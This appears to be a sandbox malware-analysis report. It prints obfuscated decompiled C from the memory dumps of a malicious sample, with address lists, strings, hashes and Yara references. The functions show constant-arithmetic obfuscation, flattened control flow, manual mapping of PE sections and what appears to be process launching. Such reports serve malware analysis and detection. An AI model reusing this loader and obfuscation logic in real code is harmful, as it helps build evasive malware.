				_t294 = 0x7f;
				_v88 = _v88 / _t293;
				_v88 = _v88 ^ 0x00001cd5;
				_v60 = 0x8b82;
				_v60 = _v60 + 0xffffb5bd;
				_v60 = _v60 * 0x35;
				_v60 = _v60 ^ 0x000df53e;
				_v12 = 0x733f;
				_v12 = _v12 >> 3;
				_v12 = _v12 ^ 0x000065d0;
				_v16 = 0x6f84;
				_v16 = _v16 | 0x29e4272c;
				_v16 = _v16 ^ 0x29e452e1;
				_v80 = 0x4249;
				_v80 = _v80 >> 0xb;
				_v80 = _v80 / _t294;
				_v80 = _v80 >> 3;
				_v80 = _v80 ^ 0x00004a04;
				_v44 = 0x4ba5;
				_v44 = _v44 + 0xffffabaf;
				_v44 = _v44 ^ 0xfffff714;
				_t243 = E00253811(__ecx, _v48, _a8, _v76, _v104, _v52);
				_t256 = _t243;
				_t301 =  &(( &_v104)[0xb]);
				if(_t256 == 0) {
					return _t243;
				}
				_t295 = E00247EC5(_v96, _v40,  *((intOrPtr*)(_t256 + 0x50)), _v64, _v68, _v44, __ecx, _v100 | _v72);
				_t302 =  &(_t301[6]);
				if(_t295 == 0) {
					L7:
					return _t295;
				}
				E00252674(_v28, _v32,  *((intOrPtr*)(_t256 + 0x54)), _t295, _v36, _v92, _a8);
				_t303 =  &(_t302[5]);
				_t288 = ( *(_t256 + 0x14) & 0x0000ffff) + 0x18 + _t256;
				_t298 = ( *(_t256 + 6) & 0x0000ffff) * 0x28 + _t288;
				while(_t288 < _t298) {
					_t261 =  <  ?  *((void*)(_t288 + 8)) :  *((intOrPtr*)(_t288 + 0x10));
					E00252674(_v20, _v24,  <  ?  *((void*)(_t288 + 8)) :  *((intOrPtr*)(_t288 + 0x10)),  *((intOrPtr*)(_t288 + 0xc)) + _t295, _v84, _v88,  *((intOrPtr*)(_t288 + 0x14)) + _a8);
					_t303 =  &(_t303[5]);
					_t288 = _t288 + 0x28;
				}
				E0024F7D8(_t295, _t256);
				_t264 = _t295;
				if(E0024E05A(_t264, _t256) == 0) {
					_push(_t264);
					E00254FE8(_v56, _t295, _v60, _v12, _v16, _v80);
					_t295 = 0;
				}
				goto L7;
			}

0x00256dbe
0x00256dc5
0x00256dcc
0x00256dd3
0x00256dda
0x00256ddc
0x00256dde
0x00256ddf
0x00256de4
0x00256dee
0x00256df9
0x00256e08
0x00256e0b
0x00256e0f
0x00256e17
0x00256e1f
0x00256e27
0x00256e2c
0x00256e31
0x00256e39
0x00256e41
0x00256e49
0x00256e51
0x00256e59
0x00256e61
0x00256e71
0x00256e75
0x00256e7d
0x00256e85
0x00256e8d
0x00256e95
0x00256e9d
0x00256ea5
0x00256eaa
0x00256eb2
0x00256eb6
0x00256ebe
0x00256ec6
0x00256ece
0x00256ed6
0x00256ede
0x00256eeb
0x00256eec
0x00256ef0
0x00256ef4
0x00256efc
0x00256f04
0x00256f0c
0x00256f14
0x00256f21
0x00256f25
0x00256f2a
0x00256f32
0x00256f3a
0x00256f3f
0x00256f47
0x00256f4f
0x00256f57
0x00256f5f
0x00256f67
0x00256f6f
0x00256f74
0x00256f7c
0x00256f8a
0x00256f8e
0x00256f96
0x00256fa3
0x00256fa7
0x00256fb1
0x00256fb6
0x00256fbe
0x00256fc6
0x00256fce
0x00256fd6
0x00256fe4
0x00256fe9
0x00256fef
0x00256ff7
0x00257004
0x00257007
0x0025700b
0x00257013
0x00257018
0x00257020
0x0025702d
0x00257031
0x0025703c
0x0025703d
0x00257043
0x0025704b
0x00257053
0x00257060
0x00257064
0x0025706c
0x00257077
0x0025707f
0x0025708a
0x00257092
0x0025709a
0x002570a2
0x002570aa
0x002570b5
0x002570b9
0x002570be
0x002570c6
0x002570ce
0x002570d6
0x002570f5
0x002570fa
0x002570fc
0x00257101
0x002571ee
0x002571ee
0x0025712d
0x0025712f
0x00257134
0x002571e7
0x00000000
0x002571e7
0x00257157
0x00257160
0x0025716d
0x0025716f
0x002571aa
0x0025718d
0x0025719f
0x002571a4
0x002571a7
0x002571a7
0x002571b2
0x002571b9
0x002571c4
0x002571c6
0x002571dd
0x002571e5
0x002571e5
0x00000000

Strings

"t, xrefs: 00256E39
R), xrefs: 0025709A
ei, xrefs: 00256E95
2!, xrefs: 00256FEF
2U, xrefs: 00256E75
IB, xrefs: 002570A2
z, xrefs: 00257020
2, xrefs: 00256F96
P, xrefs: 00256E1F
om, xrefs: 00256FD6
?s, xrefs: 0025706C
,, xrefs: 00256EFC

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: "t$2!$2U$?s$IB$ei$om$,$2$P$R)$z
API String ID: 0-3377435326
Opcode ID: 3d0207934d40abbc6c7b225edab598dbb3739286f739d077276c6eaf293611b6
Instruction ID: aa6a52d15da22de9588d18acb3ac4a7362470903c2864ca39b3e831f0a01767b
Opcode Fuzzy Hash: 3d0207934d40abbc6c7b225edab598dbb3739286f739d077276c6eaf293611b6
Instruction Fuzzy Hash: 62B123725187809FE364CF25C88A90BFBF1BBC4358F508A1CF695862A0C7B9C559CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00246D9F, Relevance: 14.1, Strings: 11, Instructions: 340
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00246D9F() {
				char _v520;
				char _v1040;
				signed int _v1044;
				intOrPtr _v1048;
				char _v1052;
				signed int _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				signed int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				signed int _v1152;
				signed int _v1156;
				signed int _v1160;
				signed int _v1164;
				signed int _v1168;
				signed int _v1172;
				signed int _v1176;
				signed int _v1180;
				signed int _v1184;
				signed int _v1188;
				signed int _v1192;
				signed int _v1196;
				signed int _v1200;
				signed int _v1204;
				signed int _v1208;
				signed int _v1212;
				signed int _v1216;
				void* _t365;
				void* _t366;
				intOrPtr _t368;
				signed int _t376;
				intOrPtr* _t378;
				void* _t379;
				signed int _t384;
				intOrPtr _t385;
				intOrPtr* _t386;
				signed int _t387;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				void* _t392;
				void* _t399;
				void* _t405;
				intOrPtr _t419;
				void* _t427;
				signed int* _t432;

				_t432 =  &_v1216;
				_v1048 = 0x446f36;
				_v1044 = 0;
				_v1168 = 0x4c2;
				_v1168 = _v1168 + 0x4422;
				_v1168 = _v1168 << 0xe;
				_v1168 = _v1168 ^ 0x12390029;
				_v1108 = 0xe6e3;
				_v1108 = _v1108 << 7;
				_v1108 = _v1108 ^ 0x80737181;
				_v1140 = 0x5a14;
				_v1140 = _v1140 + 0xffff6ad9;
				_v1140 = _v1140 + 0x3f04;
				_v1140 = _v1140 ^ 0x000003f3;
				_v1152 = 0xde22;
				_v1056 = 0;
				_t427 = 0x1cf5a099;
				_t387 = 0xc;
				_v1152 = _v1152 / _t387;
				_v1152 = _v1152 + 0x1888;
				_v1152 = _v1152 ^ 0x00005d3c;
				_v1072 = 0x75ae;
				_t388 = 0x55;
				_v1072 = _v1072 * 0x39;
				_v1072 = _v1072 ^ 0x001a1469;
				_v1160 = 0x6360;
				_v1160 = _v1160 << 0xa;
				_v1160 = _v1160 >> 0xe;
				_v1160 = _v1160 ^ 0x00005ec5;
				_v1204 = 0x5583;
				_v1204 = _v1204 ^ 0x85366cb5;
				_v1204 = _v1204 | 0x8d22480f;
				_v1204 = _v1204 + 0xffffa345;
				_v1204 = _v1204 ^ 0x8d362c42;
				_v1076 = 0x4501;
				_v1076 = _v1076 ^ 0x7eb858e4;
				_v1076 = _v1076 ^ 0x7eb84390;
				_v1176 = 0x178a;
				_v1176 = _v1176 >> 0xe;
				_v1176 = _v1176 * 0xb;
				_v1176 = _v1176 ^ 0x00005407;
				_v1196 = 0x1155;
				_v1196 = _v1196 << 0x10;
				_v1196 = _v1196 ^ 0x99db21f3;
				_v1196 = _v1196 << 8;
				_v1196 = _v1196 ^ 0x8e21cf72;
				_v1096 = 0x9447;
				_v1096 = _v1096 + 0xfffff759;
				_v1096 = _v1096 ^ 0x0000f307;
				_v1136 = 0x5f84;
				_v1136 = _v1136 | 0xcddc780f;
				_v1136 = _v1136 >> 5;
				_v1136 = _v1136 ^ 0x066ef8af;
				_v1104 = 0x8d89;
				_v1104 = _v1104 + 0xffff49e8;
				_v1104 = _v1104 ^ 0xffff9178;
				_v1060 = 0xefb9;
				_v1060 = _v1060 + 0xc1e0;
				_v1060 = _v1060 ^ 0x0001802f;
				_v1088 = 0x4e92;
				_v1088 = _v1088 / _t388;
				_v1088 = _v1088 ^ 0x00003d65;
				_v1180 = 0x8957;
				_v1180 = _v1180 ^ 0x92844c79;
				_v1180 = _v1180 >> 0xd;
				_v1180 = _v1180 + 0x6937;
				_v1180 = _v1180 ^ 0x0004ca08;
				_v1188 = 0xa977;
				_v1188 = _v1188 + 0xffff4939;
				_t389 = 0x2a;
				_v1188 = _v1188 / _t389;
				_v1188 = _v1188 + 0xff8b;
				_v1188 = _v1188 ^ 0x06195dc5;
				_v1184 = 0xd80a;
				_v1184 = _v1184 << 0xd;
				_v1184 = _v1184 | 0x4fc46678;
				_v1184 = _v1184 + 0xffff2565;
				_v1184 = _v1184 ^ 0x5fc4ec42;
				_v1144 = 0xea63;
				_v1144 = _v1144 >> 0xa;
				_v1144 = _v1144 + 0xffff7a6a;
				_v1144 = _v1144 ^ 0xffff3b56;
				_v1064 = 0xbe27;
				_v1064 = _v1064 << 0xc;
				_v1064 = _v1064 ^ 0x0be2654a;
				_v1100 = 0x1945;
				_v1100 = _v1100 ^ 0xac55a11c;
				_v1100 = _v1100 ^ 0xac55a0be;
				_v1156 = 0x9792;
				_v1156 = _v1156 << 3;
				_v1156 = _v1156 + 0xffff9949;
				_v1156 = _v1156 ^ 0x00042150;
				_v1124 = 0x4510;
				_v1124 = _v1124 + 0xffff8613;
				_v1124 = _v1124 | 0x934ed599;
				_v1124 = _v1124 ^ 0xffffb057;
				_v1208 = 0xd7d3;
				_t390 = 0x4a;
				_v1208 = _v1208 * 0x29;
				_v1208 = _v1208 << 7;
				_v1208 = _v1208 | 0x9b57b5c9;
				_v1208 = _v1208 ^ 0x9b5f9b7a;
				_v1164 = 0x3cc8;
				_v1164 = _v1164 + 0xffff7a64;
				_v1164 = _v1164 + 0xffff31bf;
				_v1164 = _v1164 ^ 0xfffea90e;
				_v1092 = 0xe652;
				_v1092 = _v1092 << 0xf;
				_v1092 = _v1092 ^ 0x732967ec;
				_v1200 = 0xc0e1;
				_v1200 = _v1200 ^ 0xc04a3a1a;
				_v1200 = _v1200 | 0x7efbebea;
				_v1200 = _v1200 ^ 0xfefb9216;
				_v1192 = 0x2d8c;
				_v1192 = _v1192 >> 7;
				_v1192 = _v1192 ^ 0x302961fe;
				_v1192 = _v1192 << 0xf;
				_v1192 = _v1192 ^ 0xb0d2939c;
				_v1132 = 0xbcbe;
				_v1132 = _v1132 | 0x9a03aa26;
				_v1132 = _v1132 << 4;
				_v1132 = _v1132 ^ 0xa03bfed3;
				_v1068 = 0x5b9d;
				_v1068 = _v1068 / _t390;
				_v1068 = _v1068 ^ 0x00000144;
				_v1172 = 0x2743;
				_v1172 = _v1172 >> 9;
				_v1172 = _v1172 + 0x7fd0;
				_v1172 = _v1172 ^ 0x00002a87;
				_v1116 = 0x6969;
				_t391 = 0x76;
				_v1116 = _v1116 / _t391;
				_v1116 = _v1116 << 0xa;
				_v1116 = _v1116 ^ 0x0003c98c;
				_v1212 = 0xb804;
				_v1212 = _v1212 + 0xffff4ff5;
				_v1212 = _v1212 << 0xd;
				_v1212 = _v1212 + 0x7e88;
				_v1212 = _v1212 ^ 0x00ffdfa3;
				_v1084 = 0x6753;
				_v1084 = _v1084 | 0x97d0336a;
				_v1084 = _v1084 ^ 0x97d00d97;
				_v1148 = 0xef82;
				_v1148 = _v1148 >> 2;
				_v1148 = _v1148 << 2;
				_v1148 = _v1148 ^ 0x0000cb2e;
				_v1112 = 0x5852;
				_v1112 = _v1112 >> 7;
				_v1112 = _v1112 ^ 0xfa80e3bf;
				_v1112 = _v1112 ^ 0xfa8084b8;
				_v1120 = 0x62fa;
				_v1120 = _v1120 >> 0xa;
				_v1120 = _v1120 << 3;
				_v1120 = _v1120 ^ 0x000065d7;
				_t384 = _v1056;
				_v1128 = 0x8139;
				_v1128 = _v1128 + 0xffff21ec;
				_v1128 = _v1128 ^ 0xad93553f;
				_v1128 = _v1128 ^ 0x526c8c2f;
				_v1080 = 0x16f9;
				_v1080 = _v1080 + 0xffffafc8;
				_v1080 = _v1080 ^ 0xffff87da;
				_v1216 = 0xd107;
				_v1216 = _v1216 << 0xa;
				_v1216 = _v1216 >> 0xb;
				_v1216 = _v1216 | 0x40b78e0e;
				_v1216 = _v1216 ^ 0x40b7ee8e;
				while(1) {
					L1:
					_t392 = 0x5c;
					while(1) {
						L2:
						_t365 = 0x201e73d8;
						do {
							L3:
							if(_t427 == 0xb9056ba) {
								_push(_v1176);
								_t366 = E0025889D(0x25c930, _v1076, __eflags);
								_t368 =  *0x25ca2c; // 0x6d8300
								__eflags = _t368 + 0x230;
								_t419 =  *0x25ca2c; // 0x6d8300
								E002429E3(_t419, 0x104, _t366, _v1196, _v1096, _v1136, _t368 + 0x230,  &_v1040, _v1104, _v1060);
								E00252025(_v1088, _t366, _v1180, _v1188);
								_t432 =  &(_t432[0xc]);
								_t427 = 0x176c6394;
								goto L17;
							} else {
								if(_t427 == 0x176c6394) {
									_t385 =  *0x25ca2c; // 0x6d8300
									_t386 = _t385 + 0x230;
									while(1) {
										__eflags =  *_t386 - _t392;
										if(__eflags == 0) {
											break;
										}
										_t386 = _t386 + 2;
										__eflags = _t386;
									}
									_t384 = _t386 + 2;
									_t427 = 0x2c3250cc;
									goto L2;
								} else {
									if(_t427 == 0x1cf5a099) {
										_push(_t392);
										_push(_t392);
										E0024C6C7(_v1152, _v1072,  &_v520, _t392, _v1160, _v1168, _v1204);
										_t432 =  &(_t432[7]);
										_t427 = 0xb9056ba;
										goto L1;
									} else {
										if(_t427 == 0x1e86e44b) {
											E002465A2(_v1052, _v1112, _v1120, _v1128, _v1080);
										} else {
											if(_t427 == _t365) {
												_t376 = E00250ADC( &_v1040, _v1132, _v1068);
												_pop(_t399);
												_t378 = E00241AC6(_v1172, _v1116, 2 + _t376 * 2, _v1052,  &_v1040, _t399, _v1212, _v1084, _v1148, _t384, _v1216);
												_t432 =  &(_t432[9]);
												__eflags = _t378;
												_t427 = 0x1e86e44b;
												_v1056 = 0 | __eflags == 0x00000000;
												while(1) {
													L1:
													_t392 = 0x5c;
													L2:
													_t365 = 0x201e73d8;
													goto L3;
												}
											} else {
												_t440 = _t427 - 0x2c3250cc;
												if(_t427 == 0x2c3250cc) {
													_push(_v1144);
													_t379 = E0025889D(0x25c9d0, _v1184, _t440);
													_pop(_t405);
													E00253EB3(_v1064, _t405, _t379, _v1100, _v1156, 0x25c9d0, _v1124, _v1208, 0x25c9d0, _v1164, 0x25c9d0, _v1140, _v1108,  &_v1052);
													_t427 =  ==  ? 0x201e73d8 : 0x22b0460c;
													E00252025(_v1092, _t379, _v1200, _v1192);
													_t432 =  &(_t432[0xf]);
													L17:
													_t365 = 0x201e73d8;
													_t392 = 0x5c;
												}
												goto L18;
											}
										}
									}
								}
							}
							L21:
							return _v1056;
							L18:
						} while (_t427 != 0x22b0460c);
						goto L21;
					}
				}
			}

0x00246d9f
0x00246da5
0x00246db2
0x00246dbb
0x00246dc3
0x00246dcb
0x00246dd0
0x00246dd8
0x00246de0
0x00246de5
0x00246ded
0x00246df5
0x00246dfd
0x00246e05
0x00246e0d
0x00246e19
0x00246e20
0x00246e2b
0x00246e30
0x00246e36
0x00246e3e
0x00246e46
0x00246e59
0x00246e5a
0x00246e61
0x00246e6c
0x00246e74
0x00246e79
0x00246e7e
0x00246e86
0x00246e8e
0x00246e96
0x00246e9e
0x00246ea6
0x00246eae
0x00246eb9
0x00246ec4
0x00246ecf
0x00246ed7
0x00246ee1
0x00246ee5
0x00246eed
0x00246ef5
0x00246efa
0x00246f02
0x00246f07
0x00246f0f
0x00246f1a
0x00246f25
0x00246f30
0x00246f38
0x00246f40
0x00246f45
0x00246f4d
0x00246f58
0x00246f63
0x00246f6e
0x00246f79
0x00246f84
0x00246f8f
0x00246fa3
0x00246faa
0x00246fb5
0x00246fbd
0x00246fc5
0x00246fca
0x00246fd2
0x00246fda
0x00246fe4
0x00246ff2
0x00246ff7
0x00246ffd
0x00247005
0x0024700d
0x00247015
0x0024701a
0x00247022
0x0024702a
0x00247032
0x0024703a
0x0024703f
0x00247047
0x0024704f
0x0024705a
0x00247062
0x0024706d
0x00247078
0x00247083
0x0024708e
0x00247096
0x0024709b
0x002470a3
0x002470ab
0x002470b3
0x002470bb
0x002470c3
0x002470cb
0x002470d8
0x002470db
0x002470df
0x002470e4
0x002470ec
0x002470f4
0x002470fc
0x00247104
0x0024710c
0x00247114
0x0024711f
0x00247127
0x00247132
0x0024713a
0x00247142
0x0024714a
0x00247152
0x0024715a
0x0024715f
0x00247167
0x0024716c
0x00247174
0x0024717c
0x00247184
0x00247189
0x00247191
0x002471a7
0x002471ae
0x002471b9
0x002471c1
0x002471c6
0x002471ce
0x002471d6
0x002471e2
0x002471e5
0x002471e9
0x002471ee
0x002471f6
0x002471fe
0x0024720b
0x00247210
0x00247218
0x00247220
0x0024722b
0x00247236
0x00247241
0x00247249
0x0024724e
0x00247253
0x0024725b
0x00247263
0x00247268
0x00247270
0x00247278
0x00247280
0x00247285
0x0024728a
0x00247292
0x00247299
0x002472a1
0x002472a9
0x002472b1
0x002472b9
0x002472c4
0x002472cf
0x002472da
0x002472e2
0x002472e7
0x002472ec
0x002472f4
0x002472fc
0x002472fc
0x002472fe
0x002472ff
0x002472ff
0x002472ff
0x00247304
0x00247304
0x0024730a
0x00247487
0x00247497
0x002474bb
0x002474c0
0x002474d5
0x002474e1
0x002474f7
0x002474fc
0x002474ff
0x00000000
0x00247310
0x00247316
0x00247467
0x0024746d
0x00247478
0x00247478
0x0024747b
0x00000000
0x00000000
0x00247475
0x00247475
0x00247475
0x0024747d
0x00247480
0x00000000
0x0024731c
0x00247322
0x00247433
0x00247434
0x00247455
0x0024745a
0x0024745d
0x00000000
0x00247328
0x0024732e
0x00247537
0x00247334
0x00247336
0x002473d6
0x002473db
0x00247413
0x0024741a
0x0024741d
0x0024741f
0x00247427
0x002472fc
0x002472fc
0x002472fe
0x002472ff
0x002472ff
0x00000000
0x002472ff
0x0024733c
0x0024733c
0x0024733e
0x00247344
0x00247351
0x00247356
0x00247392
0x002473b4
0x002473b7
0x002473bc
0x00247504
0x00247506
0x0024750b
0x0024750b
0x00000000
0x0024733e
0x00247336
0x0024732e
0x00247322
0x00247316
0x0024753f
0x00247550
0x0024750c
0x0024750c
0x00000000
0x00247518
0x002472ff

Strings

g)s, xrefs: 00247127
C', xrefs: 002471B9
), xrefs: 00246DD0
<], xrefs: 00246E3E
c, xrefs: 00247032
`c, xrefs: 00246E6C
7i, xrefs: 00246FCA
RX, xrefs: 0024725B
"D, xrefs: 00246DC3
Sg, xrefs: 00247220
6oD, xrefs: 00246DA5

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: FolderPath
String ID: "D$)$6oD$7i$<]$C'$RX$Sg$`c$c$g)s
API String ID: 1514166925-3192994148
Opcode ID: f706f7af1e0ac54d2d190e6ea586642b42365784c5eadc4176d70f5ff901145d
Instruction ID: 0e5ef3efb6015174781227ac4c9520966a90a69bde5a69c2091280fde9190ddd
Opcode Fuzzy Hash: f706f7af1e0ac54d2d190e6ea586642b42365784c5eadc4176d70f5ff901145d
Instruction Fuzzy Hash: DF0225725187819FE3A9CF61C84AA5BBBE1FBC5748F10890CF1D9862A0D7B58919CF07

Uniqueness

Uniqueness Score: -1.00%

Function 0024BB3A, Relevance: 14.0, Strings: 11, Instructions: 273
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E0024BB3A(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a28) {
				intOrPtr _v60;
				char _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				char _t284;
				signed int _t317;
				void* _t322;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				signed int _t353;
				signed int _t354;
				signed int _t355;
				intOrPtr _t357;
				signed int* _t360;

				_push(_a28);
				_push(0);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(0);
				_push(__edx);
				_push(__ecx);
				_t284 = E0024602B(0);
				_v72 = _t284;
				_t357 = _t284;
				_v176 = 0x3707;
				_t360 =  &(( &_v188)[9]);
				_v176 = _v176 << 3;
				_t322 = 0x3701c77e;
				_t349 = 0x1b;
				_v176 = _v176 * 0x3b;
				_v176 = _v176 ^ 0x9e3c13fc;
				_v176 = _v176 ^ 0x9e596314;
				_v152 = 0x78a7;
				_v152 = _v152 + 0x292e;
				_v152 = _v152 << 3;
				_v152 = _v152 ^ 0x00050e88;
				_v180 = 0xd511;
				_v180 = _v180 ^ 0x1d80f702;
				_v180 = _v180 << 0xe;
				_v180 = _v180 ^ 0xe181230f;
				_v180 = _v180 ^ 0xe905cae0;
				_v92 = 0xc43e;
				_v92 = _v92 + 0xffff1ae3;
				_v92 = _v92 ^ 0xffffb82c;
				_v104 = 0x4365;
				_v104 = _v104 >> 5;
				_v104 = _v104 >> 9;
				_v104 = _v104 ^ 0x000066ec;
				_v172 = 0xf4f1;
				_v172 = _v172 + 0x10b4;
				_v172 = _v172 + 0xffffc378;
				_v172 = _v172 / _t349;
				_v172 = _v172 ^ 0x000074e7;
				_v116 = 0x37b8;
				_v116 = _v116 + 0xffff57e4;
				_v116 = _v116 + 0xb626;
				_v116 = _v116 ^ 0x0000140c;
				_v144 = 0xb795;
				_t350 = 0x49;
				_v144 = _v144 * 0x50;
				_v144 = _v144 / _t350;
				_v144 = _v144 ^ 0x000091bc;
				_v76 = 0x1dd7;
				_t351 = 0x1c;
				_v76 = _v76 * 0x75;
				_v76 = _v76 ^ 0x000d9fef;
				_v108 = 0xced7;
				_v108 = _v108 >> 5;
				_v108 = _v108 / _t351;
				_v108 = _v108 ^ 0x00005a08;
				_v136 = 0x2b88;
				_v136 = _v136 ^ 0x78d809e4;
				_v136 = _v136 >> 0xe;
				_v136 = _v136 ^ 0x0001f73d;
				_v164 = 0x766d;
				_v164 = _v164 >> 1;
				_v164 = _v164 + 0xffffabb8;
				_t352 = 0x72;
				_v164 = _v164 * 0x5c;
				_v164 = _v164 ^ 0xfff6cd9c;
				_v168 = 0x718b;
				_v168 = _v168 ^ 0xcaa0facc;
				_v168 = _v168 ^ 0xed5841e4;
				_t112 =  &_v168; // 0xed5841e4
				_v168 =  *_t112 * 0x1f;
				_v168 = _v168 ^ 0xd720c943;
				_v100 = 0x3093;
				_v100 = _v100 << 8;
				_v100 = _v100 * 0x6e;
				_v100 = _v100 ^ 0x14df3334;
				_v80 = 0xaa77;
				_v80 = _v80 | 0xec49ccd9;
				_v80 = _v80 ^ 0xec49f00b;
				_v184 = 0x6ab1;
				_v184 = _v184 << 0x10;
				_v184 = _v184 + 0x7c9;
				_v184 = _v184 + 0xb8a8;
				_v184 = _v184 ^ 0x6ab1ec4b;
				_v96 = 0xf4af;
				_v96 = _v96 * 0x3a;
				_v96 = _v96 >> 9;
				_v96 = _v96 ^ 0x00007d4d;
				_v188 = 0xb63a;
				_v188 = _v188 ^ 0x365cf355;
				_v188 = _v188 << 2;
				_v188 = _v188 + 0xd6ce;
				_v188 = _v188 ^ 0xd971d569;
				_v120 = 0xab3a;
				_v120 = _v120 * 0x32;
				_v120 = _v120 / _t352;
				_v120 = _v120 ^ 0x00002a91;
				_v156 = 0xadc6;
				_v156 = _v156 >> 9;
				_v156 = _v156 + 0xffff5d43;
				_v156 = _v156 ^ 0xffff767e;
				_v128 = 0x4e26;
				_t353 = 0x54;
				_v128 = _v128 / _t353;
				_v128 = _v128 ^ 0xbd5b2ebf;
				_v128 = _v128 ^ 0xbd5b3d92;
				_v112 = 0x5bd4;
				_v112 = _v112 | 0xfffbefdf;
				_v112 = _v112 ^ 0xfffb9ace;
				_v88 = 0x9c25;
				_v88 = _v88 | 0xd782555b;
				_v88 = _v88 ^ 0xd782aa4a;
				_v140 = 0x1cfa;
				_v140 = _v140 >> 1;
				_t354 = 0x5d;
				_v140 = _v140 / _t354;
				_v140 = _v140 ^ 0x0000306c;
				_v148 = 0xedd7;
				_v148 = _v148 ^ 0xabf54283;
				_t355 = 0x30;
				_v148 = _v148 / _t355;
				_v148 = _v148 ^ 0x03952150;
				_v124 = 0xb354;
				_v124 = _v124 + 0xffffd7c7;
				_v124 = _v124 + 0x3a29;
				_v124 = _v124 ^ 0x0000d052;
				_v132 = 0x3532;
				_v132 = _v132 >> 0xb;
				_v132 = _v132 | 0xce8e7aaf;
				_v132 = _v132 ^ 0xce8e32c4;
				_v160 = 0x7409;
				_v160 = _v160 | 0x6d9a42b1;
				_v160 = _v160 + 0xffff6faf;
				_v160 = _v160 >> 2;
				_v160 = _v160 ^ 0x1b6641d5;
				_v84 = 0xb2d5;
				_v84 = _v84 * 0x47;
				_v84 = _v84 ^ 0x0031fe78;
				do {
					while(_t322 != 0x94ffda2) {
						if(_t322 == 0x11e75ef4) {
							_t317 = E00242833(_v180,  &_v72, _v92, _a8, _v104, _v172);
							_t360 =  &(_t360[5]);
							__eflags = _t317;
							if(_t317 != 0) {
								_t322 = 0x94ffda2;
								continue;
							}
						} else {
							if(_t322 == 0x3336903c) {
								E0025337D(_v124, _v72, _v132, _v160, _v84);
							} else {
								if(_t322 != 0x3701c77e) {
									goto L9;
								} else {
									_t322 = 0x11e75ef4;
									continue;
								}
							}
						}
						L12:
						return _t357;
					}
					E002593A8(_v116, _v144, _v76,  &_v68, 0x44, _v108);
					_push(_v164);
					_v68 = 0x44;
					_v60 = E0025889D(0x25c000, _v136, __eflags);
					__eflags = _v152 | _v176;
					_t357 = E00247AB1(_v168, _a16, 0x25c000, 0x25c000, _v152 | _v176, _v100, 0x25c000, 0x25c000, _v80, _v184, _v96, _a28, 0, _a8, _v188, _v120, _v72, _v156, _v128, _v112,  &_v68);
					E00252025(_v88, _v60, _v140, _v148);
					_t360 =  &(_t360[0x1a]);
					_t322 = 0x3336903c;
					L9:
					__eflags = _t322 - 0x294b0e13;
				} while (_t322 != 0x294b0e13);
				goto L12;
			}

0x0024bb44
0x0024bb4d
0x0024bb4e
0x0024bb55
0x0024bb5c
0x0024bb63
0x0024bb6a
0x0024bb6b
0x0024bb6c
0x0024bb6d
0x0024bb72
0x0024bb79
0x0024bb7b
0x0024bb83
0x0024bb86
0x0024bb92
0x0024bb99
0x0024bb9c
0x0024bba0
0x0024bba8
0x0024bbb0
0x0024bbb8
0x0024bbc0
0x0024bbc5
0x0024bbcd
0x0024bbd5
0x0024bbdd
0x0024bbe2
0x0024bbea
0x0024bbf2
0x0024bbfa
0x0024bc02
0x0024bc0a
0x0024bc12
0x0024bc17
0x0024bc1c
0x0024bc24
0x0024bc2c
0x0024bc34
0x0024bc44
0x0024bc48
0x0024bc50
0x0024bc58
0x0024bc60
0x0024bc68
0x0024bc70
0x0024bc7d
0x0024bc80
0x0024bc8c
0x0024bc90
0x0024bc98
0x0024bcab
0x0024bcac
0x0024bcb3
0x0024bcbe
0x0024bcc6
0x0024bcd1
0x0024bcd5
0x0024bcdd
0x0024bce5
0x0024bced
0x0024bcf2
0x0024bcfc
0x0024bd04
0x0024bd08
0x0024bd17
0x0024bd1a
0x0024bd1e
0x0024bd26
0x0024bd2e
0x0024bd36
0x0024bd3e
0x0024bd43
0x0024bd47
0x0024bd4f
0x0024bd57
0x0024bd61
0x0024bd65
0x0024bd6d
0x0024bd78
0x0024bd83
0x0024bd8e
0x0024bd96
0x0024bd9b
0x0024bda3
0x0024bdab
0x0024bdb3
0x0024bdc0
0x0024bdc4
0x0024bdc9
0x0024bdd1
0x0024bdd9
0x0024bde1
0x0024bde6
0x0024bdee
0x0024bdf6
0x0024be03
0x0024be0f
0x0024be13
0x0024be1b
0x0024be23
0x0024be28
0x0024be30
0x0024be38
0x0024be44
0x0024be49
0x0024be4f
0x0024be57
0x0024be5f
0x0024be67
0x0024be6f
0x0024be77
0x0024be7f
0x0024be87
0x0024be8f
0x0024be97
0x0024be9f
0x0024bea4
0x0024beaa
0x0024beb2
0x0024beba
0x0024bec6
